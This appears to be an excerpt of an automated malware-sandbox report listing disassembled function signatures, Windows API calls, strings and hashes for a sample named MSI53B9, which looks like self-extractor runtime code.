                                              • Thread pool initialization failed., xrefs: 0087F99B
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                              • String ID: Thread pool initialization failed.
                                              • API String ID: 3340455307-2182114853
                                              • Opcode ID: b66eec3cab3690f0c35c35ede749aca9a7617b9365985cc80830f2701e84652f
                                              • Instruction ID: bcbe2bacc31a76ddc3a0bd9002851fcd2c4b446e87d545d07a04e5ce430c4bab
                                              • Opcode Fuzzy Hash: b66eec3cab3690f0c35c35ede749aca9a7617b9365985cc80830f2701e84652f
                                              • Instruction Fuzzy Hash: DC111FB1500705AFD3305F669885BA7FBECFB56355F10482EE3DEC2241DA7168408B50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                              • API String ID: 0-56093855
                                              • Opcode ID: 04bb5c5f2a63c7200a85aea85b97b4c6fe003a236978d65bc599e69fc92ea472
                                              • Instruction ID: 5e4adede1720c3c4a6c1477ea31ff1682fbe57ca6dbe4fd6e1c67016173ecb2e
                                              • Opcode Fuzzy Hash: 04bb5c5f2a63c7200a85aea85b97b4c6fe003a236978d65bc599e69fc92ea472
                                              • Instruction Fuzzy Hash: 58018472609216AFD701EF68EC44E26BBE9F78A398F000536F651D2630D7329C05EF61
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0087CE57
                                              • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 0087CE66
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: FindHandleModuleResource
                                              • String ID: LTR$RTL
                                              • API String ID: 3537982541-719208805
                                              • Opcode ID: 6405c7e819a064482c2ba04f404366183f30a3a643f8be1609789f7070703e9a
                                              • Instruction ID: d8f9382755c9a4f575d5211e554e464c2df447ce3430c61da2e9ec38d571f760
                                              • Opcode Fuzzy Hash: 6405c7e819a064482c2ba04f404366183f30a3a643f8be1609789f7070703e9a
                                              • Instruction Fuzzy Hash: 9EF0F62160471867E72466A59C0AF6B3BACF786700F04825DB605C71C0DAA1D90C8BA5
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: __alldvrm$_strrchr
                                              • String ID:
                                              • API String ID: 1036877536-0
                                              • Opcode ID: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
                                              • Instruction ID: b9601f001904493a699bec70159f1a00a02ab942eb20e3e247edd75c51d4f097
                                              • Opcode Fuzzy Hash: 2f430cb2a74aa859eafc5ddd4affd14cc97d35a892c3f37a2c0f3c52710f6d69
                                              • Instruction Fuzzy Hash: 7FA15871900386AFDF22AF58C891BAEBBE5FF25314F1C42BDE485DB281E2389951C751
                                              APIs
                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00877F55,?,?,?), ref: 00879FD0
                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00877F55,?,?), ref: 0087A014
                                              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00877F55,?,?,?,?,?,?,?,?), ref: 0087A095
                                              • CloseHandle.KERNEL32(?,?,00000000,?,00877F55,?,?,?,?,?,?,?,?,?,?,?), ref: 0087A09C
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: File$Create$CloseHandleTime
                                              • String ID:
                                              • API String ID: 2287278272-0
                                              • Opcode ID: f3aa83bc94cffebe5c04da57cf2d1f6d1ad18b0c4f10feaa0f6af74892fc8f5e
                                              • Instruction ID: 97a1fdfc9b897212311f1ba7128c06f75a6961c757c9fe32e1ac0f313c79aed4
                                              • Opcode Fuzzy Hash: f3aa83bc94cffebe5c04da57cf2d1f6d1ad18b0c4f10feaa0f6af74892fc8f5e
                                              • Instruction Fuzzy Hash: DF41CE31248380AAE735DE28CC45FAEBBE8FB85700F04891DF5E8D31C5DA64DA088B53
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,F5E85006,00892794,00000000,00000000,00892FC2,?,00892FC2,?,00000001,00892794,F5E85006,00000001,00892FC2,00892FC2), ref: 00899440
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008994C9
                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 008994DB
                                              • __freea.LIBCMT ref: 008994E4
                                                • Part of subcall function 008959FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,008923AA,?,0000015D,?,?,?,?,00892F29,000000FF,00000000,?,?), ref: 00895A2E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                              • String ID:
                                              • API String ID: 2652629310-0
                                              • Opcode ID: bf82a9e69750cc341def7b550bb0913d4ec48330148cd734a1809f3ae1b32173
                                              • Instruction ID: 0b3333260ec6e83dde3f40c0af64056b483fba4e9301a0262f5e67545a1aa0de
                                              • Opcode Fuzzy Hash: bf82a9e69750cc341def7b550bb0913d4ec48330148cd734a1809f3ae1b32173
                                              • Instruction Fuzzy Hash: 13318E72A0020AABDF26AF68DC45EAE7BA5FB40720F19412CFC45D6190E735CD91CBA4
                                              APIs
                                              • LoadBitmapW.USER32(00000065), ref: 00889A86
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00889AA7
                                              • DeleteObject.GDI32(00000000), ref: 00889ACF
                                              • DeleteObject.GDI32(00000000), ref: 00889AEE
                                                • Part of subcall function 00888BD0: FindResourceW.KERNELBASE(00000066,PNG,?,?,00889AC8,00000066), ref: 00888BE1
                                                • Part of subcall function 00888BD0: SizeofResource.KERNEL32(00000000,751E5780,?,?,00889AC8,00000066), ref: 00888BF9
                                                • Part of subcall function 00888BD0: LoadResource.KERNEL32(00000000,?,?,00889AC8,00000066), ref: 00888C0C
                                                • Part of subcall function 00888BD0: LockResource.KERNEL32(00000000,?,?,00889AC8,00000066), ref: 00888C17
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                              • String ID:
                                              • API String ID: 142272564-0
                                              • Opcode ID: 780cf05b1b16a3673795748f32ff454116a84a92023f7db02cf0fd2a69b6ee1f
                                              • Instruction ID: 7257a64beb11f06fb398efd4635870318de6adca9960ac846d0ac988b9314976
                                              • Opcode Fuzzy Hash: 780cf05b1b16a3673795748f32ff454116a84a92023f7db02cf0fd2a69b6ee1f
                                              • Instruction Fuzzy Hash: 2B01F73264022577D61177789D42EBFB6AEFF85B61F480011F940E7592DE618C0187A2
                                              APIs
                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 00891020
                                                • Part of subcall function 00891658: ___AdjustPointer.LIBCMT ref: 008916A2
                                              • _UnwindNestedFrames.LIBCMT ref: 00891037
                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00891049
                                              • CallCatchBlock.LIBVCRUNTIME ref: 0089106D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                              • String ID:
                                              • API String ID: 2633735394-0
                                              • Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                              • Instruction ID: ec318953cf30b414ba96092af1354e7c019eb0b72bd5331a3d0c97386dbe84e6
                                              • Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                              • Instruction Fuzzy Hash: C8014C32400549FFCF226F59CC45EDA3BBAFF58754F094015FA18A5120C332E8A1EBA1
                                              APIs
                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00890B66
                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00890B6B
                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00890B70
                                                • Part of subcall function 00891C0E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00891C1F
                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00890B85
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                              • String ID:
                                              • API String ID: 1761009282-0
                                              • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                              • Instruction ID: 9d3b0379393c440cfe76274445b925ce0758b6c5e63c2a6940cc462d540d98e4
                                              • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                              • Instruction Fuzzy Hash: 12C04C6814C2465C1C203ABC664A1AD0380FE62BEDB8C51C5FC96D74139E06440A6837
                                              APIs
                                                • Part of subcall function 00888BA5: GetDC.USER32(00000000), ref: 00888BA9
                                                • Part of subcall function 00888BA5: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00888BB4
                                                • Part of subcall function 00888BA5: ReleaseDC.USER32(00000000,00000000), ref: 00888BBF
                                              • GetObjectW.GDI32(?,00000018,?), ref: 00888D24
                                                • Part of subcall function 00888EEA: GetDC.USER32(00000000), ref: 00888EF3
                                                • Part of subcall function 00888EEA: GetObjectW.GDI32(?,00000018,?), ref: 00888F22
                                                • Part of subcall function 00888EEA: ReleaseDC.USER32(00000000,?), ref: 00888FB6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ObjectRelease$CapsDevice
                                              • String ID: (
                                              • API String ID: 1061551593-3887548279
                                              • Opcode ID: f44bb6c3562513dda7020e6820a051beb997543d8e66d3d8cd7e3ba6e9fb5062
                                              • Instruction ID: 3ea92859cf16da61aacc8681df46b8b875e4328d43c7d9cf3449b1b59d78f199
                                              • Opcode Fuzzy Hash: f44bb6c3562513dda7020e6820a051beb997543d8e66d3d8cd7e3ba6e9fb5062
                                              • Instruction Fuzzy Hash: B2610271204215EFD214EF68C888E6BBBE9FF89704F50491DF599C7261DB31E805CB62
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: _swprintf
                                              • String ID: %ls$%s: %s
                                              • API String ID: 589789837-2259941744
                                              • Opcode ID: 0dcff6691d6cf492cd42665e05642a23431d97634e0474ac1bdabf6c6ff25cab
                                              • Instruction ID: ec4fe46f5e45ee316d3f2997c5e1c873f255746048623bfe29b659c7d8fa53b4
                                              • Opcode Fuzzy Hash: 0dcff6691d6cf492cd42665e05642a23431d97634e0474ac1bdabf6c6ff25cab
                                              • Instruction Fuzzy Hash: 1251B63158C318FAEAE236948C4AF357655FF45B08F60C40AB3DAE44E6C6D1985C6F1B
                                              APIs
                                              • _free.LIBCMT ref: 00897D54
                                                • Part of subcall function 00895D2D: IsProcessorFeaturePresent.KERNEL32(00000017,00895D1C,0000002C,008A80D0,00898D71,00000000,00000000,008963A2,?,?,00895D29,00000000,00000000,00000000,00000000,00000000), ref: 00895D2F
                                                • Part of subcall function 00895D2D: GetCurrentProcess.KERNEL32(C0000417,008A80D0,0000002C,00895A5A,00000016,008963A2), ref: 00895D51
                                                • Part of subcall function 00895D2D: TerminateProcess.KERNEL32(00000000), ref: 00895D58
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                              • String ID: *?$.
                                              • API String ID: 2667617558-3972193922
                                              • Opcode ID: 7a50fbe879ca6a48141c2b6467937ff6e70239af38ebe89cbb3f92dc445b7bef
                                              • Instruction ID: ed647cf2cb297cc4b569573e4e9cf5731a20c4f3fd93771ac52f06e43d40510c
                                              • Opcode Fuzzy Hash: 7a50fbe879ca6a48141c2b6467937ff6e70239af38ebe89cbb3f92dc445b7bef
                                              • Instruction Fuzzy Hash: 5F51C071E14209EFDF15EFA8C881ABDBBB5FF58314F28816AE854E7304E6319E018B50
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0087761E
                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00877799
                                                • Part of subcall function 0087A0C3: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00879EF9,?,?,?,00879D92,?,00000001,00000000,?,?), ref: 0087A0D7
                                                • Part of subcall function 0087A0C3: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00879EF9,?,?,?,00879D92,?,00000001,00000000,?,?), ref: 0087A108
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: File$Attributes$H_prologTime
                                              • String ID: :
                                              • API String ID: 1861295151-336475711
                                              • Opcode ID: 882c107a98291da641ca5b52597748c0d0a7dbaf5d2c3fb80f016460b6df1160
                                              • Instruction ID: de6db9980190bc2799407186487f804485d3b45a208e31757ae11fe435f43eb5
                                              • Opcode Fuzzy Hash: 882c107a98291da641ca5b52597748c0d0a7dbaf5d2c3fb80f016460b6df1160
                                              • Instruction Fuzzy Hash: D541B171804658A9DB28EB68DC45EEE737CFF45340F0080A9B64DE208ADB30DF85CB62
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: UNC$\\?\
                                              • API String ID: 0-253988292
                                              • Opcode ID: 48455bd04064a0c8d14ed6584d7c5b331e91de7488ac19ca21ae609514caf7e4
                                              • Instruction ID: fc4e8f741de9a8deddaaacb581a610aa829571831bd7bde76c5affb85de932f5
                                              • Opcode Fuzzy Hash: 48455bd04064a0c8d14ed6584d7c5b331e91de7488ac19ca21ae609514caf7e4
                                              • Instruction Fuzzy Hash: E1419231400219AADF21AF26DC42FEE77AAFF01350F10C166F95CE325AE771D9808BA1
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Shell.Explorer$about:blank
                                              • API String ID: 0-874089819
                                              • Opcode ID: 375b23bfaa6c8618006e95a0269167e541838f36978e2e127f04650e7542bab1
                                              • Instruction ID: dc0acbe324721b96f0952f4b5ec17a9ffa15b15b395bc97c74ecd5cdccd25312
                                              • Opcode Fuzzy Hash: 375b23bfaa6c8618006e95a0269167e541838f36978e2e127f04650e7542bab1
                                              • Instruction Fuzzy Hash: 8D219D75300A06EFE704BF64C894E2AB768FF85710B948229F115CB682CF71EC44CBA1
                                              APIs
                                                • Part of subcall function 0087CED7: GetWindowRect.USER32(?,?), ref: 0087CF0E
                                                • Part of subcall function 0087CED7: GetClientRect.USER32(?,?), ref: 0087CF1A
                                                • Part of subcall function 0087CED7: GetWindowLongW.USER32(?,000000F0), ref: 0087CFBB
                                                • Part of subcall function 0087CED7: GetWindowRect.USER32(?,?), ref: 0087CFE8
                                                • Part of subcall function 0087CED7: GetWindowTextW.USER32(?,?,00000400), ref: 0087D007
                                              • GetDlgItem.USER32(00000000,00003021), ref: 0087132B
                                              • SetWindowTextW.USER32(00000000,008A02E4), ref: 00871341
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: Window$Rect$Text$ClientItemLong
                                              • String ID: 0
                                              • API String ID: 660763476-4108050209
                                              • Opcode ID: bcf0eefe78aea653b9cf3420578d7393ed0078093e6681b03307eb6eff8c81bd
                                              • Instruction ID: 1ab7550022c24a78b0ae9b531243366a383dfe9547250092aeace982739f2747
                                              • Opcode Fuzzy Hash: bcf0eefe78aea653b9cf3420578d7393ed0078093e6681b03307eb6eff8c81bd
                                              • Instruction Fuzzy Hash: 6FF081B1540248ABEF164F64C80DAE93B59FB05754F08C014FE4CD5E95CB7DC455EB25
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF,0087FD0B,?,?,0087FD80,?,?,?,?,?,0087FD6A), ref: 0087FACD
                                              • GetLastError.KERNEL32(?,?,0087FD80,?,?,?,?,?,0087FD6A), ref: 0087FAD9
                                                • Part of subcall function 00876DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00876DF1
                                              Strings
                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 0087FAE2
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                              • API String ID: 1091760877-2248577382
                                              • Opcode ID: d184ac91ad0f4e050bf067d041880faadbb7e6de1e43dd3a3f651b7eff22738f
                                              • Instruction ID: 8d51315843f6af177fd79d3b42ea0c59ee42eb59dc47616d2bd6aad79d552ecf
